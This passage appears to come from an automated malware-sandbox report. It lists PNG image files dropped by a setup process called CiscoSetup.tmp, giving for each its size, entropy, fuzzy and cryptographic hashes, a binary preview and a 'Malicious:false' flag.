                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....{.......!.}V...U.`...Z..X.....j.j.\*!.V..P..........OM.AhQ.l.[5... .\ ,.{~s..g.=g..v....'..ef..w._J.bn.)(.-$.m....l.....[k..47..G..v....W.5...5.Wz.....'.._6@.$@....>....].g.....=..G......V$;.'..........._6 .$@..WY.U....)q;U+.V].[..qR..a..T.\O...Y....u.v).q.-..d+..]...._s<.X..sJc.TO..v.G.og....Z>T...'.`.[.x;....l....>...e.:.x...|.n.d.=....2.aKt;.....}....W.B/<6%.D*......?q....I..:~..}a.d.`'a....+R.')8..|j.....W.s..w*.|.I.oy:....'aO...txa...w....M.)..!q.S.>g1..+V.{.wL..eO.x.......a...k#.[....^....b.D4.z.....X;..e.d..O.a.D...%...+H....u^.{..vm.....c5.Kl..+.V.....&.n]:KO......l;...Q../.r*.U..........6n.....p.^...4.......1..].i..C..%O.q.W5.4....;..h..].I.B.(....-.ex..:.l.....i.N..qp..=...I_..8.E.I.j...R/.i.1..x.............?.&o......W.57.5..t...E..%D.<..@3N"*..b%8Q.1..1....V.B..8Q.o.....).<...1.T.x.L...h...KdOc..V3..E...Z'9(.<.U'.D.....MY........4...}...R.rL........g
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13810
                                                                                                                                                                                                  Entropy (8bit):7.9753795366170355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                                                                                  MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                                                                                  SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                                                                                  SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                                                                                  SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                                                                                  MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                                                                                  SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                                                                                  SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                                                                                  SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10710
                                                                                                                                                                                                  Entropy (8bit):7.9641316394298025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                                                                                  MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                                                                                  SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                                                                                  SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                                                                                  SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                                                                                  MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                                                                                  SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                                                                                  SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                                                                                  SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                                                                                  MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                                                                                  SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                                                                                  SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                                                                                  SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                                                                                  MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                                                                                  SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                                                                                  SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                                                                                  SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                                                                                  MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                                                                                  SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                                                                                  SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                                                                                  SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                                                                                  MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                                                                                  SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                                                                                  SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                                                                                  SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                                                                                  MD5:21841588532E34397E478E791A064F2C
                                                                                                                                                                                                  SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                                                                                  SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                                                                                  SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
